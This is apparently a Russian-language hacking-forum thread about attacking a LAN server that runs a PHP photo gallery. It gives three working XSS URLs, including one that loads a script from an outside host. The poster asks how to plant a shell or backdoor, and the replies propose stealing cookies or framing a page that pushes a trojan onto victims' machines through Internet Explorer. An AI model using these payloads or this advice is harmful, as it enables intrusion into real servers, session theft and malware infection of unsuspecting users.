Привет!
В локалке есть сервак под хр sp2, на нем фото галерея PHP Photo Album by John Beatty,
На енту галерею есть сплоит

http://www.example.com/photos/showimages.php?dir=<iframe%20src="C:\"%20width=400%20height=400></iframe>
http://www.example.com//photos/showfullimage.php?dir=[dir name][spc]St[spc]Clair&image=<h1>hello</h1>
http://172.17.30.2/showfullimage.php?dir=&image=<script%20language=Javascript%20src=http://test/users/alex/tooltiq.js></script>
можно ли как залить на сервак шелл, бекдор, или как прочесть с помощь html, js… пхп файл на серваку?

Никак ) Это хсс атака, а не инклюдинг.

Очень жаль (. Что самое пакостное можно сделать с этим?

Очень жаль (. Что самое пакостное можно сделать с этим?
украсть куки если XSS в профиле! или загрузить какойнить файл на комп юзера впарив ему ссылку (правд тут есть пару нюансов)

давай сюда нюансы

Использую Xss ты можеш создать фрейм в который будет подружаться твоя страничка, собсно которая будет загружать сам файл (трой) на комп жертвы, но это возможно не во всех браузерах а конкретно в Ie, и во многом зависит от настроек юзера!

А ваше посмотри видео про XSS СКАЧАТЬ (http://video.antichat.ru/file46.html)

Спасибо! Посмотрим )